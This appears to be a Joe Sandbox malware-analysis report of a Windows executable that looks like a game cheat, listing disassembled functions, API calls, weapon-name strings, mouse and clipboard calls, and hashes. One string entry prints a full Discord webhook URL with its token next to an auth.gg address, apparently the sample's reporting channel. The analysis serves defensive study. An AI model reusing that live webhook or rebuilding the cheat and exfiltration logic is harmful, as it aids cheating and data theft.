                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9261
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD92A6
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD92EB
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9330
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9375
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD93BA
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD93FF
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9444
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9489
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD94CE
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9513
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9558
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD959D
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD95E2
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9627
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD966C
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD96B1
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD96F6
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD973B
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE77C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF735DD2701), ref: 00007FF735DE7818
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9780
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD97C5
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD980A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$memmove$Concurrency::cancel_current_taskExceptionThrow
                                                                                                                                                                                                              • String ID: exists$https://auth.gg/$https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK$success
                                                                                                                                                                                                              • API String ID: 1685566030-3501797402
                                                                                                                                                                                                              • Opcode ID: 8f290b9844bc66554e0943b9491429710f4931945cb82aa81e51fda4236204cc
                                                                                                                                                                                                              • Instruction ID: e50d6bbf66e6c33a332ee81cbcfbee1d435f40bc44558f4892763b14462942f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f290b9844bc66554e0943b9491429710f4931945cb82aa81e51fda4236204cc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D239452E65BC7A4EB20FB30CC813F85361EF9AB84F906736E55C1599ADF68A680D310
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memchr$ControlDevice$_invalid_parameter_noinfo_noreturnsqrt$AsyncInputSendState
                                                                                                                                                                                                              • String ID: Assault Rifle$Bolt-Action Sniper Rifle$Burst Assault Rifle$Charge Shotgun$Compact SMG$Heavy Sniper Rifle$Hunting Rifle$Pump Shotgun$Rapid Fire SMG$Reaper Sniper Rifle$Rifl$Scoped Assault Rifle$Shot$Snip$Storm Scout Sniper Rifle$Suppressed SMG$Tactical Assault Rifle$Tactical Shotgun$Thermal Scoped Assault Rifle
                                                                                                                                                                                                              • API String ID: 175615221-766504981
                                                                                                                                                                                                              • Opcode ID: 4feb196e68ac052c87c4f073a617603d243994505892737762729c1fa3753db3
                                                                                                                                                                                                              • Instruction ID: ef3cfe79fede9f2e54f359a239e89e79c4ee7ebd9bf7071f4a79f084712a2890
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4feb196e68ac052c87c4f073a617603d243994505892737762729c1fa3753db3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EA2FD22D18687A5FA21BB35D9803B8B3A0EF55F94F844332D96D276E5DF3CB581A310
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4293554670-0
                                                                                                                                                                                                              • Opcode ID: 7ae844d97ca427b6ce6af28b0596caf87c954280dfe8d4290212548341a06eee
                                                                                                                                                                                                              • Instruction ID: 0a104937324b5793a27ac86169e8e4b5bfeb8eae929e4fc0f6371edd670d0427
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ae844d97ca427b6ce6af28b0596caf87c954280dfe8d4290212548341a06eee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F891E631B2AA0356F66CAB25A880675A2A0EF45FB4F844730D97E477D8DF3CF441A720
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDF2B5
                                                                                                                                                                                                              • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDF2D0
                                                                                                                                                                                                              • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDF2E9
                                                                                                                                                                                                              • sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDF307
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDF407
                                                                                                                                                                                                                • Part of subcall function 00007FF735DEA9E8: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF735DB2AC0), ref: 00007FF735DEA9F8
                                                                                                                                                                                                              • mouse_event.USER32 ref: 00007FF735DDF3A9
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDE9F8
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA98
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DDEAB6
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA75
                                                                                                                                                                                                                • Part of subcall function 00007FF735DEAF64: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF735DE9935,?,?,?,?,?,00007FF735DE7EA5), ref: 00007FF735DEAF7E
                                                                                                                                                                                                              • mouse_event.USER32 ref: 00007FF735DDF3C1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturnmemmovemouse_event$AcquireConcurrency::cancel_current_taskExclusiveLockmallocsqrt
                                                                                                                                                                                                              • String ID: AutoShotgun$ChargeShotgun$CombatShotgun$DoubleBarrelShotgun$DragonBreathShotgun$LeverActionShotgun$PumpShotgun$SingleShotgun$SlugShotgun$TacticalShotgun
                                                                                                                                                                                                              • API String ID: 2583424261-4283324268
                                                                                                                                                                                                              • Opcode ID: c8473d0f7ddf63f22d682195c9819569c5d8aa50c01e75bea5766a0d48eaff41
                                                                                                                                                                                                              • Instruction ID: bfb59c763285f2b57853ae153b26f724834268fc5ee8dad06df5affbc6c46e26
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8473d0f7ddf63f22d682195c9819569c5d8aa50c01e75bea5766a0d48eaff41
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F021A22E29BC7A4E710EB34D8913F9A3A1FF95B94F905332E95C166A5DF3CA580D310
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$malloc$memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1620901979-0
                                                                                                                                                                                                              • Opcode ID: e1ee8ee98bb23783a28880feee87ba09bfe001c88ea59f5335f5572ffde610ea
                                                                                                                                                                                                              • Instruction ID: 280b7b77dd72d0f03b55253f76cd90c22dc652a984b2f1301344f58ddda78775
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1ee8ee98bb23783a28880feee87ba09bfe001c88ea59f5335f5572ffde610ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDB2E032A147829AE754DF26E08066DB7B0FB48F88F448336DE8967794DF38E491DB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$mallocmemmovesqrtf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2108133213-0
                                                                                                                                                                                                              • Opcode ID: 4ef6fc20b4569a25c7c5efcfae1a44eaa4e018ef8b6f1b8e867ebb820ccd15f2
                                                                                                                                                                                                              • Instruction ID: 38e0574bef5d45a078c67bc37c2d842b13eaee6d802032f82689257462233a88
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ef6fc20b4569a25c7c5efcfae1a44eaa4e018ef8b6f1b8e867ebb820ccd15f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32729D13E28BE845D7139B36508227AE7D1EF6EB84F19D732ED44A6662EB3CE441D700
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: cosfsinf$ControlDevice$asinatan2memsettanf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1330759842-0
                                                                                                                                                                                                              • Opcode ID: 9881525b51d2b45473f77a5a7116237475bbd077c05d9cc28d843ee098c6749c
                                                                                                                                                                                                              • Instruction ID: 45064a1e4c3ff0730c4bd95ebc569830c19a2ec3cffef4f8896a17905b4158ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9881525b51d2b45473f77a5a7116237475bbd077c05d9cc28d843ee098c6749c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85D13A22D2CF8654E213EB3694422B6E364AF6F7D4F549332F94D35672EF38A1C29610
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipboardLock$Exclusive$AcquireCloseGlobalfree$DataOpenReleaseUnlockmallocmemmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4281195603-0
                                                                                                                                                                                                              • Opcode ID: 6b2921db98ba7c6d43f433a8bfbd634b7c9f85a1e20594f9cdbe628148eb6379
                                                                                                                                                                                                              • Instruction ID: 0ceab38d3006e5f395ef45710ce1176776333f4ba70b097364a5c8481b1831e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b2921db98ba7c6d43f433a8bfbd634b7c9f85a1e20594f9cdbe628148eb6379
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63517431A1E603A1FA54BB15E9D0275A3A1FF44F81FC44435D94E877A4DF3DE581A360
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: fmodffreemallocmemmovestrncpy
                                                                                                                                                                                                              • String ID: #SCROLLY
                                                                                                                                                                                                              • API String ID: 3140659168-1064663049
                                                                                                                                                                                                              • Opcode ID: cc9a8be1b09f683bf4ec16d276bd7ce63086c3276a4a0d325976cdee221a76eb
                                                                                                                                                                                                              • Instruction ID: 460159c92695a16916c013333d5dbc4bfecdd5a90381ee64bfb8d0c462e1c10d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc9a8be1b09f683bf4ec16d276bd7ce63086c3276a4a0d325976cdee221a76eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE734B32E28387A6F711EA3684802BDB790EF19B84F954731DE99672A1DF39F440E750
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemchrmemset$__stdio_common_vsnprintf_smemmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 864542015-0
                                                                                                                                                                                                              • Opcode ID: 11b9f2972749d4bb8e9afe2521042b875e02b3c1f8a575bda5bedb391a229a53
                                                                                                                                                                                                              • Instruction ID: ab8694ffacab12a590b466ed5ef8a1e4eecb138d592be78b65439bef68fd096e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11b9f2972749d4bb8e9afe2521042b875e02b3c1f8a575bda5bedb391a229a53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4622E533A28BC695E711DF75D4802A9B7A0FB98B94F449332EE8D27659DF38E180D710
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqrtf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 321154650-0
                                                                                                                                                                                                              • Opcode ID: a7adad535bd7471d93ec57ba27684531f34ed3adee84f5914d1640d4bec47caa
                                                                                                                                                                                                              • Instruction ID: 46cbbd60e151dde6f3aae4b39160a5782ffcaa9bf4ffb0f70cb1f2a4a468cfcf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7adad535bd7471d93ec57ba27684531f34ed3adee84f5914d1640d4bec47caa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAB1B322E38BCD50E223A63754C21F9E260AFBF7C5F2DDB23F984756B29B1461C16610
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 453615576-0
                                                                                                                                                                                                              • Opcode ID: 149ae9741bd631a9e052683c4a4dc1564fe2eb0373ebb708d7a9a0031ebeafb6
                                                                                                                                                                                                              • Instruction ID: d317bb2eb4391ae5929b2c0d9b7b6c0b0f8a1aecef6a21a905e8f23253bd97e9
